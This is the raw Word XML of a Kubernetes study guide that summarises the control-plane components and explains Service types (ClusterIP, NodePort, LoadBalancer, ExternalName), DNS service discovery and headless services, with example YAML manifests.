          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35867B3D" w14:textId="14303D66" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00BF7CA0"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Summary of Key Kubernetes Concepts</w:t>
      </w:r>
      <w:r w:rsidR="00BB108D" w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0332A98E"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Master Node (Control Plane)</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Manages the cluster's state, scheduling, and API interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499F709F"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Worker Node</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Runs containers in pods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B05AE9"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API Server</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The entry point for all Kubernetes interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9C4A46"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Scheduler</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Determines where pods are placed on nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DA5106"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etcd</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Stores the configuration data for Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6314BE"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Kubelet</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures containers run properly on the nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601F9463"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Kube Proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Manages networking and load balancing for services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368C923A" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00000000" w:rsidP="009D1D6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0BC6C4C">
          <v:rect id="_x0000_i3414" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D28300" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00BF7CA0"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This architecture provides a highly scalable, reliable, and maintainable environment for running containerized applications in production. Let me know if you need further details on any component!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2EF238" w14:textId="445AC937" w:rsidR="00BF7CA0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00BF7CA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30F130E">
          <v:rect id="_x0000_i3415" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B754F5" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00CE4B95" w:rsidRDefault="00BF7CA0" w:rsidP="00BF7CA0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="845" w:name="_Toc196308325"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Kubernetes Services?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="845"/>
    </w:p>
    <w:p w14:paraId="75739789" w14:textId="5559EBC0" w:rsidR="0013672E" w:rsidRPr="009D1D6F" w:rsidRDefault="0013672E" w:rsidP="009D1D6F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Kubernetes Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E896165"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In Kubernetes, a </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Service</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an abstraction that defines a set of pods and a policy for accessing them. It provides stable networking and ensures that the user or another pod can access the application running in the pods. Services </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>decouple the clients from the pods by providing a consistent network endpoint, even as pods may be dynamically created, destroyed, or moved between nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276A5EFF"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Kubernetes services help to manage and expose your application in a reliable way across your entire cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CB277E" w14:textId="77777777" w:rsidR="0013672E" w:rsidRPr="009D1D6F" w:rsidRDefault="00000000" w:rsidP="009D1D6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4254551">
          <v:rect id="_x0000_i3416" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB6D1DC" w14:textId="77777777" w:rsidR="0013672E" w:rsidRPr="009D1D6F" w:rsidRDefault="0013672E"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Types of Kubernetes Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429DAA88"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ClusterIP</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A3F36E" w14:textId="77777777" w:rsidR="0013672E" w:rsidRPr="009D1D6F" w:rsidRDefault="0013672E"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides internal access to services within the Kubernetes cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBE9C7F" w14:textId="77777777" w:rsidR="0013672E" w:rsidRPr="009D1D6F" w:rsidRDefault="0013672E"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ClusterIP</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> service is accessible only within the cluster. Pods in the same cluster can communicate with the service, but it is not accessible from outside the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4486B6A9" w14:textId="77777777" w:rsidR="0013672E" w:rsidRPr="009D1D6F" w:rsidRDefault="0013672E"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Suitable for internal applications or microservices that need to communicate internally but do not require external access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1A5B6A"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you have a database or an internal API service, you can expose it as a ClusterIP service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3131F289"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apiVersion: v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64324384"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kind: Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7754FF4F"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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D36A2B"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name: my-clusterip-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539CBFD3"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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F77D114"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selector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729CB46B"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app: myapp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C26A01"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ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D696907"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 protocol: TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEF0205"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port: 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2D3BE7"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targetPort: 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655FEEB3"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clusterIP: None  # Optional: can set to None for headless service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C552471"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NodePort</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5963CD9A" w14:textId="77777777" w:rsidR="0013672E" w:rsidRPr="009D1D6F" w:rsidRDefault="0013672E"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Exposes the service on a static port on each node’s IP address, making it accessible from outside the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D382E1" w14:textId="77777777" w:rsidR="0013672E" w:rsidRPr="009D1D6F" w:rsidRDefault="0013672E"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NodePort</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> service forwards traffic from an external port (on the node) to the internal port (on the pod) and is accessible externally via &lt;NodeIP&gt;:&lt;NodePort&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2150EE32" w14:textId="77777777" w:rsidR="0013672E" w:rsidRPr="009D1D6F" w:rsidRDefault="0013672E"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Useful when you need external access but do not have an external load balancer. However, this is often not recommended for production as it's not a scalable solution for large clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CEC2B1"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0FC190"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apiVersion: v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A81932B"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kind: Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F7BB26"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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D39B8A"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name: my-nodeport-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4202C4D7"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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F463F6C"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selector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FC11D6"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app: myapp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15452579"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ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BB478F"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 protocol: TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B5000E"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port: 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D00163"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targetPort: 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D206D0"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nodePort: 30001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5C16DA"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type: NodePort</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E5995E"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With this service, you can access it externally using &lt;NodeIP&gt;:30001.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01395B7B"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LoadBalancer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1077373B" w14:textId="77777777" w:rsidR="0013672E" w:rsidRPr="009D1D6F" w:rsidRDefault="0013672E"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Exposes the service externally using a cloud provider’s load balancer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488E9918" w14:textId="77777777" w:rsidR="0013672E" w:rsidRPr="009D1D6F" w:rsidRDefault="0013672E"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LoadBalancer</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> service creates an external load balancer that routes traffic to the service and exposes it outside the Kubernetes cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2193F7B6" w14:textId="77777777" w:rsidR="0013672E" w:rsidRPr="009D1D6F" w:rsidRDefault="0013672E"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This type is often used in production environments, especially when running on cloud providers like AWS, GCP, or Azure, where cloud load balancers are available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4492D5F0"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50262357"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apiVersion: v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6226A190"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kind: Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F10ECCC"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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475945FF"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  name: my-loadbalancer-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DF1317"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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EC2FD2"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selector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF37CA7"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app: myapp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61020C20"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ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26981253"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 protocol: TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3303C6CE"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port: 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EE9FB5"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targetPort: 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0771B88D"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type: LoadBalancer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C1ABE0"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This will provision a cloud provider's load balancer and map it to the service. After it's provisioned, the external IP can be used to access the service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EB8220"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ExternalName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EBBF9F" w14:textId="77777777" w:rsidR="0013672E" w:rsidRPr="009D1D6F" w:rsidRDefault="0013672E"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Maps a service to an external DNS name. It doesn’t create a proxy or forward traffic like other service types. It just returns the external DNS name for the requested service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302300DE" w14:textId="77777777" w:rsidR="0013672E" w:rsidRPr="009D1D6F" w:rsidRDefault="0013672E"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is used when you want Kubernetes to refer to an external service that is outside of the Kubernetes cluster but still managed within the system as if it were a part of the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E510C6" w14:textId="77777777" w:rsidR="0013672E" w:rsidRPr="009D1D6F" w:rsidRDefault="0013672E"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Can be used for linking services like databases or APIs outside of Kubernetes (e.g., a database hosted outside the Kubernetes cluster).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C16ABF"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E291407"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apiVersion: v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F22715"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kind: Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD248F7"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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A45FAA2"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name: my-external-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09ACD699"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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B15278"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type: ExternalName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB5A9DA"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externalName: external.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2341C506"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When you try to access my-external-service from within the cluster, Kubernetes will route traffic to external.example.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D302CD4" w14:textId="77777777" w:rsidR="0013672E" w:rsidRPr="009D1D6F" w:rsidRDefault="00000000" w:rsidP="009D1D6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4E10828">
          <v:rect id="_x0000_i3417" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C349CF4" w14:textId="77777777" w:rsidR="0013672E" w:rsidRPr="009D1D6F" w:rsidRDefault="0013672E"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Kubernetes Service Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7976119B"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Kubernetes services allow for </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>service discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which means that each service gets a stable DNS name and IP address within the cluster. When a service is created, it automatically gets a DNS entry of the form &lt;service-name&gt;.&lt;namespace&gt;.svc.cluster.local. Other pods can access the service using this DNS name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418E66C3"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For example, if you have a service my-service in the default namespace, its DNS name would be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F091FA2"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my-service.default.svc.cluster.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0F46B1"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You can use this DNS name in your application configuration to access other services within the cluster, making service discovery easy and seamless.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2117E106" w14:textId="77777777" w:rsidR="0013672E" w:rsidRPr="009D1D6F" w:rsidRDefault="00000000" w:rsidP="009D1D6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02D2E1">
          <v:rect id="_x0000_i3418" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C206C3C" w14:textId="77777777" w:rsidR="0013672E" w:rsidRPr="009D1D6F" w:rsidRDefault="0013672E"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Headless Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E51774"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>headless service</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a special type of service where Kubernetes does not allocate an IP address to the service. Instead, DNS queries for the service return multiple A records (IP addresses of the pods), which enables direct access to the pods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C1BF4A"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Useful for stateful applications (e.g., databases, caches) where you need to control the communication between pods directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D4675A"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To create a headless service, you set the clusterIP to None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078DD000"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apiVersion: v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66713D7B"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kind: Service</w:t>
      </w:r>
    </w:p>
